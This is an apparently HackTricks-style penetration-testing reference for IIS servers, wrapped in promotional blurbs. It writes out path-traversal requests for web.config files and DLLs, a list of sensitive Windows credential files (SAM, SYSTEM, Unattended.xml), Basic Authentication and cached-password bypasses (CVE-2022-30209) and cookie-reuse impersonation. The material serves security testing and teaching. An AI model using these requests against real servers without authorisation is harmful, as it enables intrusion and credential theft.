Skip to content

IIS - Internet Information Services โ€‹

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

WhiteIntel โ€‹

WhiteIntel is a dark-web fueled search engine that offers free functionalities to check if a company or its customers have been compromised by stealer malwares.

Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.

You can check their website and try their engine for free at:

โ›“๏ธ External Link

Test executable file extensions:

  • asp
  • aspx
  • config
  • php

Internal IP Address disclosure โ€‹

On any IIS server where you get a 302 you can try stripping the Host header and using HTTP/1.0 and inside the response the Location header could point you to the internal IP address:

nc -v domain.com 80
openssl s_client -connect domain.com:443

Response disclosing the internal IP:

GET / HTTP/1.0       

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
Location: https://192.168.5.237/owa/
Server: Microsoft-IIS/10.0
X-FEServer: NHEXCHANGE2016

Execute .config files โ€‹

You can upload .config files and use them to execute code. One way to do it is appending the code at the end of the file inside an HTML comment: Download example here

More information and techniques to exploit this vulnerability here

IIS Discovery Bruteforce โ€‹

Download the list that I have created:

โฌ‡๏ธ File Download

It was created merging the contents of the following lists:

https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt
http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html
https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt
https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt

Use it without adding any extension, the files that need it have it already.

Path Traversal โ€‹

Leaking source code โ€‹

Check the full writeup in: https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html

โ„น๏ธ

As summary, there are several web.config files inside the folders of the application with references to "assemblyIdentity" files and "namespaces". With this information it's possible to know where are executables located and download them.
From the downloaded Dlls it's also possible to find new namespaces where you should try to access and get the web.config file in order to find new namespaces and assemblyIdentity.
Also, the files connectionstrings.config and global.asax may contain interesting information.\

In .Net MVC applications, the web.config file plays a crucial role by specifying each binary file the application relies on through "assemblyIdentity" XML tags.

Exploring Binary Files โ€‹

An example of accessing the web.config file is shown below:

markup
GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
Host: example-mvc-application.minded

This request reveals various settings and dependencies, such as:

  • EntityFramework version
  • AppSettings for webpages, client validation, and JavaScript
  • System.web configurations for authentication and runtime
  • System.webServer modules settings
  • Runtime assembly bindings for numerous libraries like Microsoft.Owin, Newtonsoft.Json, and System.Web.Mvc

These settings indicate that certain files, such as /bin/WebGrease.dll, are located within the application's /bin folder.

Root Directory Files โ€‹

Files found in the root directory, like /global.asax and /connectionstrings.config (which contains sensitive passwords), are essential for the application's configuration and operation.

Namespaces and Web.Config โ€‹

MVC applications also define additional web.config files for specific namespaces to avoid repetitive declarations in each file, as demonstrated with a request to download another web.config:

markup
GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
Host: example-mvc-application.minded

Downloading DLLs โ€‹

The mention of a custom namespace hints at a DLL named "WebApplication1" present in the /bin directory. Following this, a request to download the WebApplication1.dll is shown:

markup
GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
Host: example-mvc-application.minded

This suggests the presence of other essential DLLs, like System.Web.Mvc.dll and System.Web.Optimization.dll, in the /bin directory.

In a scenario where a DLL imports a namespace called WebApplication1.Areas.Minded, an attacker might infer the existence of other web.config files in predictable paths, such as /area-name/Views/, containing specific configurations and references to other DLLs in the /bin folder. For example, a request to /Minded/Views/web.config can reveal configurations and namespaces that indicate the presence of another DLL, WebApplication1.AdditionalFeatures.dll.

Common files โ€‹

From here

C:\Apache\conf\httpd.conf
C:\Apache\logs\access.log
C:\Apache\logs\error.log
C:\Apache2\conf\httpd.conf
C:\Apache2\logs\access.log
C:\Apache2\logs\error.log
C:\Apache22\conf\httpd.conf
C:\Apache22\logs\access.log
C:\Apache22\logs\error.log
C:\Apache24\conf\httpd.conf
C:\Apache24\logs\access.log
C:\Apache24\logs\error.log
C:\Documents and Settings\Administrator\NTUser.dat
C:\php\php.ini
C:\php4\php.ini
C:\php5\php.ini
C:\php7\php.ini
C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache\logs\access.log
C:\Program Files (x86)\Apache Group\Apache\logs\error.log
C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache2\logs\access.log
C:\Program Files (x86)\Apache Group\Apache2\logs\error.log
c:\Program Files (x86)\php\php.ini"
C:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\Apache Group\Apache\conf\logs\access.log
C:\Program Files\Apache Group\Apache\conf\logs\error.log
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
C:\Program Files\Apache Group\Apache2\conf\logs\access.log
C:\Program Files\Apache Group\Apache2\conf\logs\error.log
C:\Program Files\FileZilla Server\FileZilla Server.xml
C:\Program Files\MySQL\my.cnf
C:\Program Files\MySQL\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.1\my.cnf
C:\Program Files\MySQL\MySQL Server 5.1\my.ini
C:\Program Files\MySQL\MySQL Server 5.5\my.cnf
C:\Program Files\MySQL\MySQL Server 5.5\my.ini
C:\Program Files\MySQL\MySQL Server 5.6\my.cnf
C:\Program Files\MySQL\MySQL Server 5.6\my.ini
C:\Program Files\MySQL\MySQL Server 5.7\my.cnf
C:\Program Files\MySQL\MySQL Server 5.7\my.ini
C:\Program Files\php\php.ini
C:\Users\Administrator\NTUser.dat
C:\Windows\debug\NetSetup.LOG
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\php.ini
C:\Windows\repair\SAM
C:\Windows\repair\system
C:\Windows\System32\config\AppEvent.evt
C:\Windows\System32\config\RegBack\SAM
C:\Windows\System32\config\RegBack\system
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SecEvent.evt
C:\Windows\System32\config\SysEvent.evt
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\winevt\Logs\Application.evtx
C:\Windows\System32\winevt\Logs\Security.evtx
C:\Windows\System32\winevt\Logs\System.evtx
C:\Windows\win.ini 
C:\xampp\apache\conf\extra\httpd-xampp.conf
C:\xampp\apache\conf\httpd.conf
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
C:\xampp\FileZillaFTP\FileZilla Server.xml
C:\xampp\MercuryMail\MERCURY.INI
C:\xampp\mysql\bin\my.ini
C:\xampp\php\php.ini
C:\xampp\security\webdav.htpasswd
C:\xampp\sendmail\sendmail.ini
C:\xampp\tomcat\conf\server.xml

HTTPAPI 2.0 404 Error โ€‹

If you see an error like the following one:

It means that the server didn't receive the correct domain name inside the Host header.
In order to access the web page you could take a look to the served SSL Certificate and maybe you can find the domain/subdomain name in there. If it isn't there you may need to brute force VHosts until you find the correct one.

Old IIS vulnerabilities worth looking for โ€‹

Microsoft IIS tilde character โ€œ~โ€ Vulnerability/Feature โ€“ Short File/Folder Name Disclosure โ€‹

You can try to enumerate folders and files inside every discovered folder (even if it's requiring Basic Authentication) using this technique.
The main limitation of this technique if the server is vulnerable is that it can only find up to the first 6 letters of the name of each file/folder and the first 3 letters of the extension of the files.

You can use https://github.com/irsdl/IIS-ShortName-Scanner to test for this vulnerability:java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/

Original research: https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf

You can also use metasploit: use scanner/http/iis_shortname_scanner

Basic Authentication bypass โ€‹

Bypass a basic authentication (IIS 7.5) trying to access: /admin:$i30:$INDEX_ALLOCATION/admin.php or /admin::$INDEX_ALLOCATION/admin.php

You can try to mix this vulnerability and the last one to find new folders and bypass the authentication.

ASP.NET Trace.AXD enabled debugging โ€‹

ASP.NET include a debugging mode and its file is called trace.axd.

It keeps a very detailed log of all requests made to an application over a period of time.

This information includes remote client IP's, session IDs, all request and response cookies, physical paths, source code information, and potentially even usernames and passwords.

https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/

Screenshot 2021-03-30 at 13 19 11

ASPXAUTH uses the following info:

  • validationKey (string): hex-encoded key to use for signature validation.
  • decryptionMethod (string): (default โ€œAESโ€).
  • decryptionIV (string): hex-encoded initialization vector (defaults to a vector of zeros).
  • decryptionKey (string): hex-encoded key to use for decryption.

However, some people will use the default values of these parameters and will use as cookie the email of the user. Therefore, if you can find a web using the same platform that is using the ASPXAUTH cookie and you create a user with the email of the user you want to impersonate on the server under attack, you may be able to use the cookie from the second server in the first one and impersonate the user.
This attacked worked in this writeup.

IIS Authentication Bypass with cached passwords (CVE-2022-30209) <a href="#id-3-iis-authentication-bypass" id="id-3-iis-authentication-bypass"></a> โ€‹

Full report here: A bug in the code didn't properly check for the password given by the user, so an attacker whose password hash hits a key that is already in the cache will be able to login as that user .

python
# script for sanity check
> type test.py
def HashString(password):
    j = 0    
    for c in map(ord, password):
        j = c + (101*j)&0xffffffff
    return j

assert HashString('test-for-CVE-2022-30209-auth-bypass') == HashString('ZeeiJT')

# before the successful login
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 401 Unauthorized

# after the successful login
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 200 OK

WhiteIntel โ€‹

WhiteIntel is a dark-web fueled search engine that offers free functionalities to check if a company or its customers have been compromised by stealer malwares.

Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.

You can check their website and try their engine for free at:

โ›“๏ธ External Link
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks: